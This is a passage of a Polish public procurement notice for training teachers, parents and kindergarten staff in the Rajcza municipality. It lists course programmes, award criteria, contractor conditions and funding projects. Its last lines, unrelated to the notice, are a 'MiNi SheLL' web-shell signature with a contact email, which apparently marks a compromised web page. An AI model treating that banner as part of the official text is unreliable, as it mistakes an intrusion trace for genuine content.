podstawowych założeń i narzędzi TSR, Opanowanie w podstawowym zakresie umiejętności posługiwania się metodami TSR w praktyce. Cele szkolenia II st.: Cele szkolenia: Pogłębienie znajomości modelu TSR i rozwój umiejętności pomocowych, ukończenie szkolenia daje możliwość samodzielnego posługiwania się tą metodą w stopniu zaawansowanym. <br/>Planowana liczba godzin szkolenia: całość 200 godzin (70 godz. - I stopień, 130 godz. - II stopień).<br/>5) Komunikacja wspomagająca i alternatywna AAC kurs on-line /stacjonarnie, 1 osoba. Cel: podstawowa wiedza dotycząca ACC, na czym polega komunikacja alternatywna i wspomagająca poziomy rozwoju kompetencji komunikacyjnych dziecka, sposoby porozumiewania się dziecka oraz ich rola w jego życiu, jak dokonać diagnozy możliwości komunikacji dziecka, podstawowe pomoce ułatwiające porozumiewanie się, wybrane techniki nauki używania znaków i symboli, Metoda Ułatwionej Komunikacji, Jak dobrać właściwą metodę komunikacji do poziomu możliwości komunikacyjnych dziecka. <br/>Planowana liczba godzin szkolenia: 16 godzin.<br/>6) Szkolenie rady pedagogicznej/stacjonarne: Logorytmika – jako metoda profilaktyki logopedycznej w przedszkolu, 15 osób. Program: zabawy ruchowe, słuchowe i słowne wspierające rozwój mowy, rozwoju mowy. <br/>Planowana liczba godzin szkolenia:4 godziny.<br/>7) Szkolenie rady pedagogicznej/stacjonarne: Dyscyplina w grupie przedszkolnej -stacjonarne, 15 osób. Program: podstawy dyscypliny, trudności indywidualne, problemy grupowe, współpraca. <br/>Planowana liczba godzin szkolenia: 7 godzin.<br/>8) Szkolenie rady pedagogicznej/stacjonarne: Dziecięca matematyka w przedszkolu wg koncepcji E. Gruszczyk-Kolczyńskiej, 15 osób. Program: orientacja przestrzenna, rytmy, liczenie, o kształtowaniu pojęcia liczby i wspomaganiu rozwoju orientacyjnego. Planowana liczba godzin szkolenia: 20 godzin.<br/>9) Szkolenie rady pedagogicznej: Odmienna nauka czytania sylabowego/globalnego/ stacjonarne, 15 osób. Program: mówienie kolejnych etapów pracy z dziećmi zgodnie z metodą odimienną, inicjacja – ćwiczenia praktyczne, wykorzystanie wizytówek – propozycje aktywności, etap – ściana pełna liter – pokaz, prezentacja liter – przebieg zajęcia – ćwiczenia praktyczne, utrwalanie liter – loteryjka i inne – ćwiczenia, targ liter – pokaz, nazywanie świata – ćwiczenia praktyczne, charakterystyka porównawcza metody odimiennej z metodą analityczno – syntetyczną. <br/>Planowana liczba godzin szkolenia: 3 godziny.<br/>10) Szkolenie stacjonarne: Bateria diagnozy rozwoju psychomotorycznego dzieci pięcio- i sześcioletnich, 2 osoby. Program: wstępna psychologiczno-pedagogiczna diagnoza przesiewowa rozwoju psychomotorycznego dzieci pięcio- i sześcioletnich, w tym oceny gotowości szkolnej, omówienie narzędzi. <br/>Planowana liczba godzin szkolenia: 4 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 – Szkoła Podstawowa nr 1 w Rajczy:<br/>1) Szkolenie - Depresja jako choroba. Specyficzne cechy depresji wieku dorastania, stacjonarne/on-line dla 20 osób. Program: epidemiologia, obraz kliniczny depresji dzieci i młodzieży, przebieg i skutki depresji, czynniki predysponujące, kiedy zaczynają się prawdziwe kłopoty, szkoła przyjazna nastolatkom. <br/>Planowana liczba godzin szkolenia: 8 godzin.<br/>2) Szkolenie - Dziecko z zaburzeniami ze spektrum autyzmu w grupie i klasie, stacjonarne dla 20 nauczycieli + 50 rodziców. Program: czym jest autyzm, zależność autyzmu a płeć, triada zaburzeń autystycznych, zaburzenia w sferze fizycznej oraz poznawczej, które mogą pojawić się u dziecka z ASD, kryteria diagnostyczne, kto i w jaki sposób może postawić diagnozę, przykładowe narzędzia do diagnozy ASD, na czym polega terapia dziecka z ASD, przegląd metod terapii, które mogą być wykorzystane w pracy z dzieckiem z ASD.<br/>Planowana liczba godzin szkolenia: 8 godzin.<br/>3) &#34;Szkolenie - Ochrona zdrowia psychicznego młodzieży/ stacjonarne/on-line dla 20 osób. Program: definicje zdrowia psychicznego, komponenty zdrowia psychicznego, czym jest rezyliencja i jak ją rozwijać, jak dbać o zdrowie psychiczne, pomoc psychologiczna w sytuacji kryzysowej. <br/>Planowana liczba godzin szkolenia: 8 godzin.<br/>4) Szkolenie - Wzmocnienie kompetencji nauczycieli w udzielaniu pomocy psychologiczno-pedagogicznej oraz w tworzeniu IPE-T, stacjonarne/on-line dla 20 osób. Program: Kto wchodzi w skład zespołu ds. WOPU i IPET?, Jakie są zadania poszczególnych uczestników zespołu ds. WOPFU i IPET? Jakie obowiązki związane z organizacją kształcenia specjalnego spoczywają na specjalistach? W jaki sposób rodzice uczniów są zaangażowani w pracę zespołu i jakie mają uprawnienia oraz obowiązki? Jaką rolę w pracach zespołu pełnią nauczyciele poszczególnych przedmiotów? Jaką rolę odgrywa wychowawca klasy jako koordynator zespołu ds. IPET i WOPFU? <br/>Planowana liczba godzin szkolenia: 16 godzin.<br/>5) Szkolenie - sposoby komunikowania się - Uczeń - Nauczyciel - Rodzic stacjonarne/on-line dla 20 osób. Program: Jak przeprowadzić wstępną diagnozę problemu. Jaki jest problem – analiza abc. Gdzie pokierować dalej, jak to zrobić. Skuteczne metody motywowania ucznia do działania: elementy dialogu motywującego, skuteczne pochwały. Komunikacja w zespole klasowym. Rozwiązywanie konfliktów. Elementy mediacji i negocjacji. Współpraca z rodzicami. Rodzaje kontaktów z rodzicami i sposób ich prowadzenia. Ustalanie celów spotkań. Metoda częstych spotkań. Budowanie interwencji przy stałej współpracy z rodzicami. Model częstych spotkań.<br/>Planowana liczba godzin szkolenia: 8 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 – Szkoła Podstawowa w Rycerce Górnej:<br/>1) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo, 15 osób. Program: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami. <br/>Planowana liczba godzin szkolenia: 12 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym: Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/>1.3. sytuacji ekonomicznej lub finansowej: Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/>1.4. zdolności technicznej lub zawodowej: Zamawiający uzna, że Wykonawca wykazał spełnienie warunku, jeśli wykaże, odrębnie dla każdej części zamówienia, że dysponuje lub będzie dysponował: co najmniej 1 (jedną) osobą prowadzącą zajęcia, która w okresie ostatnich trzech lat, a jeżeli okres prowadzonej działalności jest krótszy – w tym okresie, przeprowadziła grupowe szkolenia z zakresu (o tematyce) danej części zamówienia, na którą składa ofertę w wymiarze:<br/>a) dla części pierwszej zamówienia – co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 4 modułów składających się na część zamówienia,<br/>b) dla części drugiej zamówienia – co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 2 modułów składających się na część zamówienia,<br/>c) dla części trzeciej zamówienia - co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 2 modułów składających się na część zamówienia,<br/>d) dla części czwartej zamówienia - co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 4 modułów składających się na część zamówienia,<br/>e) dla części piątej zamówienia - co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 10 modułów składających się na część zamówienia,<br/>f) dla części szóstej zamówienia - co najmniej 1 (jedno) szkolenie odpowiednio dla każdego z 5 modułów składających się na część zamówienia,<br/>g) dla części siódmej zamówienia - co najmniej 1 (jedno) szkolenie odpowiadające modułowi składowemu części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej, pod rygorem nieważności.<br/>2. W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą Zamawiającego.<br/>3. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>4. Propozycja zmian umowy inicjowana przez Wykonawcę nie ma charakteru roszczeniowego.<br/>5. Zamawiający przewiduje możliwość dokonania zmian (o których mowa w ust. 2) postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:<br/>a) zajdzie konieczność wprowadzenia zmian w dokumentacji przetargowej, sposobie lub zakresie wykonania przedmiotu umowy;<br/>b) zajdzie konieczność uzasadnionej zmiany terminu wykonania przedmiotu zamówienia,<br/>c) działania siły wyższej,<br/>d) przekształcenia podmiotowego Wykonawcy,<br/>e) zmiany członków personelu kluczowego Wykonawcy (asystenci) w przypadku wystąpienia nieprzewidzianych okoliczności takich jak ustanie zatrudnienia lub innych okoliczności uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednakże przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym,<br/>f) ustawowej zmiany stawki VAT,<br/>g) zmiany podwykonawcy (o ile dotyczy) występującego po stronie Wykonawcy (w przypadku podejrzenia, że zdolność techniczna i zawodowa podwykonawcy nie gwarantuje odpowiedniej jakości wykonania usług lub dotrzymania terminów),<br/>h) zmiana danych osobowych lub adresowych Wykonawcy.<br/>6. Niezależnie od powyższych zapisów, zmiana umowy może zostać dokonana w sytuacjach i na warunkach określonych w art. 455 ust. 1 pkt 2) – 4).<br/>7. Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.<br/>8. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego przez komisję powołaną przez Zamawiającego, w skład której wejdzie Zamawiający i przedstawiciel Wykonawcy.<br/>9. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej– aneksu podpisanego przez obie strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać w terminie do dnia 14 lutego 2025 r. do godz. 10:00 za pośrednictwem Platformy e-Zamówienia, https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Projekt pn. „Dzieciaki na START - czyli odkrywamy edukację w SP nr 1 w Rajczy” w ramach Funduszy Europejskich dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+) dla Priorytetu: FESL.06.00-Fundusze Europejskie dla edukacji dla Działania: FESL.06.02-Kształcenie ogólne (dot. części VI zamówienia); <br/>Projekt pn. „Akceptacja włączająca czyli START do Szkoły w Rycerce Górnej” w ramach Funduszy Europejskich dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+) dla Priorytetu: FESL.06.00-Fundusze Europejskie dla edukacji dla Działania: FESL.06.02-Kształcenie ogólne (dot. części VII zamówienia);<br/> Projekt pn. „Przedszkolaki z POWERem” w ramach Funduszy Europejskich dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+) dla Priorytetu: FESL.06.00-Fundusze Europejskie dla edukacji dla Działania: FESL.06.01-Edukacja przedszkolna (dot. części V zamówienia);<br/> Projekt pn. Przedszkolaki z gminy Rajcza - zdolni odkrywcy! w ramach Funduszy Europejskich dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+) dla Priorytetu: FESL.06.00-Fundusze Europejskie dla edukacji dla Działania: FESL.06.01-Edukacja przedszkolna (dot. części I, II, III, IV zamówienia)

Creat By MiNi SheLL
Email: jattceo@gmail.com